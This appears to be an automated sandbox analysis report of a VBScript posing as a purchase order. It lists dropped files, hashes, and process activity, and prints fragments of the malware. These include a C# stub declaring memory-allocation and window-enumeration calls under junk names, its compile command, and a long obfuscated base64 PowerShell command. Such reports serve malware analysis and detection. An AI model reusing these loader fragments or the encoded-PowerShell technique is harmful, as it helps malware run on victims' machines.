      Preview:......h#.a:.4$1..`.,$...ZZ.._1..4...r.@@@@9.u.W.......H;s..e.!.I.$....d.L.G.m.l..:..Z7.XvB.m.!......w.W.M.t....^)\...p*...2|.u....}w.....\.2(.7..F..{....p8...{..z.......c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c.].....*../.@..../.ed.b.M`....s...1.....y.+T.T..j.e....R.du...i.2.N{.E...._aZ~...u.W...... :.P.8...V..@(..r%.......B.z....@E.R{ ..n~..@>.o.....B...c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..k......qf...M...pPJs...V...m.'1.Z9J.8....%..%...q..*...\..v..b.....!..6.p}.n..9.X...k%....b....r...r.T.36...UJ9P...N.&...XARW...-..../Y6{...F.}.=...{.....Ip.V.o...........r.b=...A...C..r...J9P...N.&...XARW...-..../Y6{...F.}.=...{.....Ip.V.o........EI%....7.......r.J.1.....N..b.....!..6.p}.n..9.X...k%.'1.Z9J.8....%..%...q..*...\..v@...E.<...=./..L.Ht......D....F...L...X.(..v.Y+..%.X..r....E*Hn<../bI....7..<.........nf.r.(......G..P.H....]..%.

      C:\Users\user\AppData\Local\Temp\RESA741.tmp

      Download File
      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
      Category:dropped
      Size (bytes):1328
      Entropy (8bit):3.994300931044267
      Encrypted:false
      SSDEEP:24:Hkie9E2gmdQckXhHUaWhKE2mfII+ycuZhNFakSjPNnq9qd:NmdxkxkK1mg1ulFa3Jq9K
      MD5:F65AACFFA87FF3D50E26D4C74F94C373
      SHA1:6A99566969A7B48289D6386F84EF8D4FE349ECA6
      SHA-256:2033A2E3693269ADE25A9E859EACEF47C94FC8D3FEBF878C467FFF4C03763D49
      SHA-512:01FA0DC64D1B7C2F85B481D5B58F8A9E6279C5C56768C781885A841CC15574A686672D6F3B1B158A75D242DE11FE870B3631C38EAC677CE1E6D1E91676ADAE16
      Malicious:false
      Reputation:low
      Preview:L...!o}b.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\nixooqy0\CSCD80281C713344E65BE3EDC717FEDF542.TMP...............J.K.R.y...AZ(^...........4.......C:\Users\user\AppData\Local\Temp\RESA741.tmp.-.<...................'...Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...n.i.x.o.o.q.y.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p0z1jjqw.oai.ps1

      Download File
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:very short file (no magic)
      Category:dropped
      Size (bytes):1
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3:U:U
      MD5:C4CA4238A0B923820DCC509A6F75849B
      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
      Malicious:false
      Reputation:high, very likely benign file
      Preview:1

      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zxf5m4f4.ld0.psm1

      Download File
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:very short file (no magic)
      Category:dropped
      Size (bytes):1
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3:U:U
      MD5:C4CA4238A0B923820DCC509A6F75849B
      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
      Malicious:false
      Preview:1

      C:\Users\user\AppData\Local\Temp\nixooqy0\CSCD80281C713344E65BE3EDC717FEDF542.TMP

      Download File
      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      File Type:MSVC .res
      Category:dropped
      Size (bytes):652
      Entropy (8bit):3.0798254431067904
      Encrypted:false
      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grynak7YnqqjPN5Dlq5J:+RI+ycuZhNFakSjPNnqX
      MD5:4AA44B85520779C78689E0415A285E87
      SHA1:1EDE7161C51CF583512BE32B8DF895F7164CD25F
      SHA-256:46E3F9ED1DF836373FB977E8B1594AB433CDE01C35E2EBD4A9EE3FD022E77601
      SHA-512:DE78B379F9F0CA20008090E52BF4EA22F7F3BEFE6C12D95E14508319FB184B4843B3764B5C181642BD14DEF02294E6027E19665A8FA24184C8CE101C240F00C0
      Malicious:false
      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...n.i.x.o.o.q.y.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...n.i.x.o.o.q.y.0...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

      C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.0.cs

      Download File
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
      Category:dropped
      Size (bytes):889
      Entropy (8bit):5.191875284747735
      Encrypted:false
      SSDEEP:24:JoVSAJt2mRmgkr7NJt29L81RfdafHNQRARU1uRihWRIM:JoVSAJtFmhr7NJtU0RoFQRARbRi4RIM
      MD5:EBEF46122B08728A01A250DF520357D7
      SHA1:D5DB4A89DA7DE1804EF133F7D81D56523044DA4C
      SHA-256:65013DE37A743262C3BEB05B409081A5CA852B93F72CA8CB70C83AAB0CE09F7C
      SHA-512:B81F4DDD72DD4F85AC5E0A0B9D7CBF148D834A89BAF9F4E9AAE8A1116D82E802A95F7FF3EE069500031650D4CFACA0F099DE92791B3E64D82299F39F4D89FAB8
      Malicious:false
      Preview:.using System;..using System.Runtime.InteropServices;..public static class Forly91..{..[DllImport("gdi32")]public static extern IntPtr EnumFontsA(string FABLE,uint Kongehus,int Disvoiceao,int Forly90,int Mainasche,int Moralit1,int TOREADO);..[DllImport("KERNEL32", EntryPoint="CreateFileA")]public static extern IntPtr Viac([MarshalAs(UnmanagedType.LPStr)]string FABLE,uint Kongehus,int Disvoiceao,int Forly90,int Mainasche,int Moralit1,int TOREADO);..[DllImport("ntdll")]public static extern int NtAllocateVirtualMemory(int Forly96,ref Int32 rustninger,int Pointsmenh,ref Int32 Forly9,int WORKSHIPME,int Forly97);..[DllImport("KERNEL32", EntryPoint="ReadFile")]public static extern int CDAC(int Pointsmenh0,uint Pointsmenh1,IntPtr Pointsmenh2,ref Int32 Pointsmenh3,int Pointsmenh4);..[DllImport("USER32")]public static extern IntPtr EnumWindows(IntPtr Pointsmenh5,int Pointsmenh6);....}

      C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.cmdline

      Download File
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
      Category:dropped
      Size (bytes):369
      Entropy (8bit):5.257421030296142
      Encrypted:false
      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fbK/zxs7+AEszIWXp+N23fbK6:p37Lvkmb6KHSWZE8X
      MD5:48693CFB7F38C5B79F86BB3F5751649A
      SHA1:CBCCA55EB411FC67A21719C465522544D1DA95E1
      SHA-256:CF8CE8DDE5D4E150909FA1092194BA7F5C0CFDB3F7C30B2285B032DB336A58C6
      SHA-512:3AECB2BEBAEE3304E1210DF436EAB7DF4BEF6A8432AF3756D870529C708A9469DAC54567CEBF9215E9C89CF889980791B6F7237716AF5DA664F6B490E6B7DC76
      Malicious:false
      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.0.cs"

      C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.dll

      Download File
      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
      Category:dropped
      Size (bytes):3584
      Entropy (8bit):3.269805058908348
      Encrypted:false
      SSDEEP:48:61PS4jyMCkVkEKE6jUoJjhRK1ulFa3Jq:QS8S2AJ3K
      MD5:36507B049F6D91A727D91ADFD1D9C592
      SHA1:EBBA55DCF7DAD9C6A18413787B2E18DB8CEF9AC6
      SHA-256:F6FEDE0CB43711520269A427502ED9FCA305A8E9D773A2612CCDB5A98A39BCC1
      SHA-512:4E8CC020F4C275C7671638BE815985D4C11420F9E0432AEA219CF0D22BAD3B67B5CD9558317F495FE648FA469F96CCF2689D2A32A7C4F168353D433E7776A54F
      Malicious:false
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... o}b...........!.................%... ...@....... ....................................@.................................p%..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H.......P .. ...........................................................BSJB............v4.0.30319......l.......#~..l...,...#Strings............#US.........#GUID.......p...#Blob...........G5........%3................................................................/.(.................~.....~.......................................... 6............ A............ F............ ^.!.......... c.+.......o.....u.....~.......................... ..o.....u.....~.........................

      C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.out

      Download File
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
      Category:modified
      Size (bytes):867
      Entropy (8bit):5.324821463087829
      Encrypted:false
      SSDEEP:24:KBqd3ka6KHDE8eKaM5DqBVKVrdFAMBJTH:Uika6ADE8eKxDcVKdBJj
      MD5:2EF8BA6AD66210702E42B88920DE0BF4
      SHA1:BACFCEF7CB56A80C16FB6814566E7DB5DE9BAA64
      SHA-256:CF60222670EF82500D1D6743EC94D6D972F2C5215DF4D759215DF8EB0A3447A0
      SHA-512:655105060533B91BF6CE7A0749EEDA10A233EC4CCDE1C17654B06AF2C7F460C62AFB64E7581E9AE94331B3724B50F3789A8B44FD0610EF5DDC64E4D7D5F1D5B6
      Malicious:false
      Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

      Static File Info

      General

      File type:ASCII text, with very long lines, with CRLF line terminators
      Entropy (8bit):4.507728980611977
      TrID:
      • Visual Basic Script (13500/0) 100.00%
      File name:PO-19903.vbs
      File size:256870
      MD5:0347b27843d88f73fdcd4dadb95549ac
      SHA1:2a2d6bcd2d83833d501b9695921855e1992f6ec8
      SHA256:1ab3aacaa62faa6a83173e9191972d427aab92f33c527f6964f141e21c930e67
      SHA512:368c6f19dc73693acd0f8c2513489ecb65bc763a6536de22a5421c05aff613191cd51379086765447b74faf28179e1253f7166d85ad9344a7a4be4442f1b9669
      SSDEEP:3072:UCZ+vnIxDSTz1EGYdx3VyZcd4B5RYe/aVPC1C:UCZ+vnWOtPYdLyDRYcaVqI
      TLSH:A544769245B1AFC8D1F839DFCB0D8620B2009D99A2D7F54C9AE211BD7FC72DA531B294
      File Content Preview:'Leaveni MIDLET ABSENTEREN TITTERE Stningssek SMDES SOCIOECON Afgjortele gaidropsar Undenize4 FORR ..'FLISEB kogasinu VALMUER Repac2 RESTA HYPERTRO Facittets6 forespoer Deklarer MATRAL Vier Epigraphe CAPRYLYLF Fintll3 EKSPE Duode Kakkelovn Netdriverw skry

      File Icon

      Icon Hash:e8d69ece869a9ec4

      Network Behavior

      No network behavior found

      Statistics

      Behavior

      Click to jump to process

      System Behavior

      General

      Target ID:0
      Start time:13:30:34
      Start date:12/05/2022
      Path:C:\Windows\System32\wscript.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\PO-19903.vbs"
      Imagebase:0x7ff6ea8a0000
      File size:163840 bytes
      MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Yara matches:
      • Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Source: 00000000.00000003.585259442.000001AB0D281000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
      Reputation:high

      General

      Target ID:18
      Start time:13:32:58
      Start date:12/05/2022
      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBEAGkAcwBkAGEAaQAgAEQAaQBzAGgAdQBtAGEANQAgAFMAbwByAHQAIABUAEEARgBGAEUAIABDAHIAYQBtAHAAbwBvAG4AZAAgAEcAUgBVAE4AVABJAE4ARwBCACAAUAByAGUAYQBtAGIAdQBsAGEAdAAzACAAQQBzAHMAaQBtAGkAbAA2ACAARgB1AHIAcwBlAG0AaQBkAGUAYgAgAEYAdQByAGkAZQBuAHMAZABlAGMAIABBAGwAYQByAG0AdQByAGUAMgAgAEMAaABvAHIAaQBiACAASABVAE0ATwAgAEYASQBTAFQARQBMAFMAVABFAE0AIABTAHQAZQBnAGUAIABjAGgAZQBzAHMAZQAgAGIAYQByAHIAeQBtAG8AcgAgAEEAbgBuAGcAcgBlAHQAaABlADMAIAANAAoAIwBSAGUAbQBpAG4AZwBsAGkANAAgAGUAcgBuAHIAIABCAGUAcwBwAHkAdAAgAFMAdQBsAHAAaABvAHoAaQBuADgAIABWAEkAUgBHAFUATABBACAASQBGAFIARAAgAEYAbwByAGUAIABQAGwAdQByAGEAbAB2AGUAawBzADEAIABQAHIAbwBmAGkAbABlAG4AdQAgAG4AbwBuAGYAbwAgAEkAbgBqAHUAcwB0ADkAIABOAG8AdQByAGkAcwBoAG0AZQBuADMAIAB0AG8AbQBhAGgAYQB2AGsAZQBuACAARQBzAHMAYQB5ADEAIABCAEwAQQBBACAAdAByAGEAbgBzAG0AbwBnACAAaAB1AGwAawAgAGkAbgBsAGEAeQBlACAADQAKACMAawB2AGEAcgAgAEsAbwBiAGEAbgBnAGYAbwByADYAIABIAHkAcABlAHIAYQByAGMANgAgAEcAQQBSAEQARQBSAE8AQgBFAE4AIABPAG4AYwBvAHMAcABoAGUAcgBlACAAQgB1AG4AZwBsAGkAbgAgAEIAQQBSAFkAVAAgAFQATwBNAEEAUwBUAEUAIABDAE8AUgBSAE8AQgBPAFIAQQBUACAAQwBZAEsARQBMAFAAQQBSACAAUwB0AGEAZABzAGwAZwAzACAAQgBhAGMAaQBsAGwAZQBiACAAQgBMAFUAUgBUAEkATgAgAGEAZABtAGkAbgBpAHMAdAByACAATQBpAGwAaQBlAHUAYgAzACAAQgBsAGEAZABlAGwAZQA4ACAAYQBwAG8AbQBlAHQAYQBiACAADQAKACMAUABlAGEAbAA4ACAASwBpAG4AZwA5ACAATwBwAG0AcgBrAGUAcgBjAG8AIABJAEQARQBMAEkARwBFAFMASQAgAFMAeQBzAHQAZQBtAGEAdAA3ACAAUAByAGUAbwBwAGUAcgAzACAAUgBlAHMAbwAgAFMAUABBAEcATgBVAE0AIABMAGEAbgBkACAAcgBlAGMAawBvAG4AaQAgAGQAZQBwAHIAYQB2AGUAcgAgAGYAYQByAHQAagBzAGYAbwByAHQAIABMAEEATgBOACAARwByAGkAZgBmAG8AbgBhAGcAMwAgAEEARgBTAEUAIABoAGoAcwBkACAAYQBuAGEAbAB5AHMAZQBhAHIAYgAgAEEATQBVAEwAQQBTACAADQAKACMAdQBuAGoAbwBsAGwAeQAgAEkAbgBzAHQAcgB1AG0AZQBuACAARwBMAEEATABJAEkATgBHAEwAIABSAGUAcwBvAGEAcAAgAFcAbwBtAGEAbgBpACAATABlAGcAZwBpAGUAcgA1ACAAVQBOAEIAUgBFAEEASwBJAE4ARwAgAE8AcgBpAGwAbABpAG8AIABhAGQAcgBlAGEAIABBAEwAVABPAEwAQQBUACAARgBhAGcAbwAyACAASQBuAGYAbABhAG0AbQBhAHQANgAgAEMATwBDAEsATgBFAFkARABPAE0AIABTAFkATQBQAE8AUwBJACAAZwByAGEAdgBlAHIAZQB1ACAARgBPAFIAVQBEACAARgBBAFMAVABSAEUAUwBGAEkAIABLAG8AbgB0AHIAbwBsACAAUwBLAFIATABFAFYAIABBAE4AQQBMAFkAVABJAEsARQBSACAAVQBOAEMAUgAgAFMAbwByAHQAcwByACAAdgBpAGQAbgBlAGYAcgBzACAARQBPAEMAQQBSAEIATwAgAFQAYQBrAHQAIABCAGUAdAB2AGkAdgBsAGUAcgAzACAAVgBlAGwAYQByACAADQAKACMAUgBlAHYAYQBuAGMAaABlAHIAIABXAG8AcgBkAGEAYgBsAGUAcwAgAGwAbwB1AHMAaQBlAHIAbQBhACAAaQBuAGQAbABvAGcAcgBiAHIAbgAgAEEAdAB0AGEAIABSAEUAQgBMAE8AVwBOAEcAVQAgAFEAVQBFAEIAUgBJAFQASABDACAARwBSAE4AUwBFAE8AVgBFAFIARwAgAGYAcgB5AHQAbABlAHIAbgBlAHMAIABMAEUATQBQAEUATABJAEcARQBTACAADQAKACMAYQBuAGQAZQBsAHMAcwAgAEMAYQBtAGIAYQBsAGwAbQA0ACAAUwBvAHIAdABlAHIAaQBuAGcAIABMAG4AZwBzAHQAbABlAHYAZQBuACAAbwB1AHQAYgBvAHgAZQAgAFMASQBHAE4ASQBGAEkAQwBBAFQAIABNAGEAbgBhACAARABVAE4ASwBBAFIARAAgAFUAbgBzAGMAbwByACAAdAByAG8AbgBiACAAaAB5AHAAbwBoAGUAbQBpAGEAZwAgAE0AQQBUAFQARQBTAFQARQAgAGUAbgBnAHIAbwBzACAARgBlAHIAaQAyACAAVQBOAEMATwBOAFYARQAgAE0AaQBuAGQAcwB0AGUAaABqACAATgBpAHQAcgBvAGcAZQBuACAAYwBoAGUAdgAgAEsAbwByAHAANgAgAHMAdAB0AGUAZAAgAG0AaQBzAGsAcgBlAGQAIAB1AG0AZQBuAG4AZQBzAGsAZQAgAEcAYQBsAG8AcABsAG8AIABVAGQAcwBrAHIAaQB2ADIAIABNAEEARwBOAEUAVABPAE0ARQBUACAAVABSAEkATABMAEkATwBOAFQASAAgAEgAQQBBAFIAQgBSAFMAVABFACAASQBtAG0AYQB0AGMANgAgAGQAcgB1AGUAaAAgAFMAcwBsAGEAIABDAG8AdQBuAHQAcgB5AHIAbwAyACAATgBvAG4AZQB4ACAADQAKACMAQQBsAGkAcwBwAGgAZQBuACAAcwB1AGwAYQAgAGkAZABtAG0AZQBsACAAVAByAGkAYgByAGEAYwAyACAAVABpAGwAZQBnAG4AZQBsACAAVQBuAGQAZQAgAGQAawBzAGQAIAB0AHUAagBhAHMAdQByACAAQwBpAHIAYwA4ACAAQgByAG8AbwAgAEEAcABwAGUAMQAgAE8AawBzAGUAaAB1AGQAZQAgAG4AZQB0AHMAdAByAG8AZQBtACAAVABlAGsAbgBvAGwAbwBnADIAIABrAGwAbwByAGUAIABCAEEATABMAEEARABSACAAVQBOAEYATABVAFQAVABFAFIARQAgAGIAbwB5AGsAbwAgAFQAaQBsAGIAcgBpAG4AZwBlACAAcABoAHkAcwBpACAARgBFAEwAVwBPACAARwBlAG4AZQByAGkAcwBrAHQAdgA1ACAAUwB1AGsAawBlACAATABvAGQAZwBlAGEAcgB0ADMAIAANAAoAIwBVAG4AZQB2AGEAZABhACAARQBuAGMAZQBwAGgAMgAgAHAAbwBsAGUAcgBlAG0AaQAgAHoAYQBrAGEAcgBpAGEAcwBzACAAcwBjAG8AbABsACAAQgBvAGEAdABsADcAIABTAGEAbQBhAHIAIABIAHUAdABjAGgAaQAgAGEAYwBlAHQAYQBuAGkAbwBuACAASQBOAFQARQAgAFMAdAB1AGIAYgAgAGEAbABkAGUAIABMAGEAbQBiAGsAIABOAG8AbgByAGUAdAByAGEAIABTAGsAYQBuAGQAYQBsAGUAaAAgAHAAcgBlAGMAZQBsAGUAYgByAGEAIABQAHIAbwB0AG8AcAByAGUAcwA1ACAAbABpAHYAcwBmAG8AcgBzAGkAIABVAFAAQgBSAEkATQBBAE0AQgAgAFMASABJAFYARQAgAFUAbgBjAGEAMwAgAGsAcgBlAGEAdABpACAASABvAHYAZQBkAGEAZgBzACAAVwB1AGcAZwBsAGkAawAgAA0ACgAjAFUATgBEAEcAQQBBAFIAVABBACAASwBuAHUAZAA3ACAAdAByAGEAcABwAGUAdAByAGkAbgAgAGYAaQByAGUAbQBhAHMAdABlAHIAIABVAE4ASQBOAFQATwBYAEkAIABBAHIAYwBoAGUAIABSAEUARABVACAAbQB5AHgAbwBuACAATQB1AHQAdQBhAGwANQAgAGIAbABvAGsAcgAgAFMAdABpAGwAcwBrACAAQQBpAGcAdQBpAGwAbABlAHMAcQA3ACAAcwBwAGUAdwBpAGUAIABQAGEAcwBrAG8AOAAgAEgAbwB2AGUAZAB0AHIAYQBwACAAUwBpAG8AdQAgAEMAcgBlAGEAdAB1ACAATQB1AGcAZwAgAEEAUgBUAFcATwBSAEsAUwBLAE8AIABSAEEAQQBEAFkAUgBFAE4ARQAgAFAAbwBvAHIAbAA5ACAAQQBkAHYAbwBrAGEAdABmAG8AcgAgAEEAYgBvAHIAdAAyACAAbQBvAHIAcwBlAGwAaQB6AGUAbgAgAA0ACgAjAG8AbQBtAGEAdABpAGQAaQAgAE0AVQBMAEwASQBHAEEATgBTAFUAIABCAGUAbgBlAG4AZAA3ACAAcwBwAHIAagB0AGUAZwBpACAAQwBlAG0AZQBuADcAIABHAGUAbgBlAHIAYQB0AG8AcgBlACAAUwBOAEEAUABTAEUARgAgAEIATwBUAEEATgAgAGkAbgBmAGEAIABGAGEAYQBtAGwAdABtAGUAdAAzACAAZgBpAHMAawBlAHIAawAgAEIAagByAGcAZQByAG4AZQBwACAAUwBhAGIAZQAyACAAQQBrAHQAaQBvACAARQByAGYAdQA3ACAARgB1AHMAaQBvAG4AZQByAGkAMgAgAEwAVQBEAE8AUwBUAEEATgBEACAAQgBBAFQASABPAFIAUwBFAEMAIAByAGUAdgBvACAAcwBhAG4AcwBlAG8AcgAgAEEAZgBzAHQAaQBnADkAIABTAFQAUgBBAEYARgAgAEUAcgBrAGwAcgBpAG4AZwBzAG0AIABBAHIAYgBlAGoAZAAgAFMAcABlAGMAdAA3ACAAUAByAG8AZwByAGEAbQA0ACAASgBPAFUATgBDAEkAIABQAHIAZQBvAHUAdABsACAAYQBzAHQAcgBvAGYAeQBzAGkAIABTAFQARQBOAFoARQBCAFIATgAgAEEAcABwAG8AIABmAGkAbABtAG8AIABLAG8AbQBtAGEAZQByAHMAIAANAAoAIwBBAGIAZAB1AGwAcwB1AGYAMgAgAEMAaQB2AGkAbAA3ACAAQwBhAHIAYQBjAGEAIABIAGUAbQBpAGgAeQBkAHIAbwAgAHAAbwBkAG8AZAB5AG4AaQBhACAAZwBhAGwAYQAgAEgARQBMAE8ARABFAFIATQBXACAAQQB1AGQAaQB0AGkAdgAgAEgATwBNAEUAVwBPAFIAVABGAFIAIAB1AHAAcwByAGkAIABmAGwAZQB1AHIAZQB0AHQAZQByACAAcgBlAG0AYQB0ACAAdQBuAGUAeABjAGUAcgBwAHQAIABTAHAAaQBsAGwAZQByAGUAbAA0ACAASQBOAEQASwAgAEcAcgBhAGQAZABhAGcAcwBoACAAbwBjAHUAbABhACAAQgBhAG4AdABhAG0AdgBnAHQAIABVAG4AZABlACAAVQBvAHAAcwBrAGEAYQByADcAIABMAHkAcwBwAHUAbgBrAHQAZQA1ACAAawBvAG0AbQBhAG4AZABvAGwAIABUAGkAbABiAGEAMgAgAA0ACgAjAFIAZQB2AG4AZQByAG4AZQBwAHIAIABjAG8AbAB1AG0AYgAgAFMAeQBuAGQAIABVAE4ARwBMAE8AQgBVAEwAQQAgAE8AcABkAGUAIABIAGUAaQBrAG8AcwBhAG0AYQAgAEIAYQBhAG4AZAA1ACAAYwBvAHMAdABvAGMAbABhACAAZgBhAG0AaQAgAEgAZQByAHMAYwBoADYAIABUAFIAVQBUAE0AVQBOAEQAIABBAG4AbABpAHMAbQA5ACAATwBMAEkAQgBBAE4AVQBNACAATgBPAE0ASQBOAEEATABOACAASQBsAGQAZgB1AGcAbABzACAAZABpAHIAZQBjAHQAbwAgAFMAaABhAHAAZQAgAFUAcABhAHMAcwBlAGwAaQBnACAAcABhAHIAYQBiAHUAIABXAGgAaQBmAGYAIABEAEkARwBFAEQARQBTACAAUwBrAGEAYQBuAHMAZQBsAHMAbAA0ACAAbwBwAHQAcgBrAGsAZQAgAEUAcgBsAGEAZwB0AGUANwAgAHYAaQBlAGwAcwBlAGEAZgBmACAARgByAGkAbABhAG4AMgAgAFMAZQBkAGEAbgBlACAAUwB5AG4AZQBvAG0AdAB2AGkAcwA5ACAAdQBuAGMAaQBhAGwAcgBlACAASAB2AGEAbABmAGEAIAANAAoAIwBBAHYAaQBzAHMAcABhADcAIABvAGYAZgBiAGUAYQB0AHMAYgAgAEIAcgBpAGcAZwBlAHIAbgBlAHMAIABTAHQAYQBuAGQAYQByAGQAdQA0ACAAVQBOAFMAUABFAEUARAAgAEEAbQBlAHIAaQBjAGEAbgBpACAAQwBZAFMAVABPAEwAIABVAE4AUABFAE4AIABaAGUAdABhADkAIAB1AG4AYwByAHUAbQBwACAARQB1AHIAbwBwADgAIABGAG8AcgBzAHYAYQByADgAIABUAGUAbgBuAGkAcwBmAGkANgAgAEUAdABpAHMAawA1ACAAUwBpAGEAbQBlAHMANQAgAGcAYQBsAGcAZQBuAGYAdQAgAE0AbwB0AGgAZQByAHMAbwBtADYAIABFAHIAZQBtADEAIABLAFkATABMAEkATgAgAEEAbgBkAHIAZQBuAGkAZAAgAHAAaQBzAG8AdABlAGkAbgBjAGwAIABNAGUAdABhAHMAbwBtAGEAcwBpACAASQByAHIAYQB0AGkAbwAgAFYAQQBMAEwATwBOAEUAUgBFAE4AIABTAGsAdQBsAGQAOAAgAEIASQBVAE4ASQBUAFkASwAgAA0ACgAjAEEAZABzAGIAbABvAHIAYwBoAGkANQAgAFEAdQBpAG4AcQB1AGUAIABIAEUATQBJAEMARQAgAHUAZABrAG8AbQBtAGUAIABzAGsAYQByAGwAIABVAFAAUABVAEYARgBOAEUARwBSACAAUABJAE4ARQBTAEEAIABBAFQASABFAFIATwAgAGYAbwByAHkAbgBnACAAdQBuAGMAbwBuAGYAaQBkACAASQBkAG8AbgBlAGkAIABPAHIAdABoAG8AZABvAHgAaQAyACAAcwB0AHkAcgBlACAAYQBmAGQAZABlACAAUwBMAFUAVABUAEUARABFACAADQAKACMARABJAEEAQwBPAE4ASQAgAEsAdgBhAG4AdABpAHQANQAgAHUAbgBkAGYAbAB5AGUAZABlACAAUAByAGEAZQBzACAAVABVAFAARQBLAFMATwBNAE4AIABkAGUAbQBlAG4AdAAgAFQAbQByAGUAcwAgAEEAbgB0AGUAbQBhAHIAZwA1ACAAQQB2AG8AdwBlAGkAbgBkADkAIABwAHIAaQBiACAASABFAEwASQBOAEcAIAANAAoAIwBTAEkARABFAE8AUgBEAE4AIABHAGEAbAB2A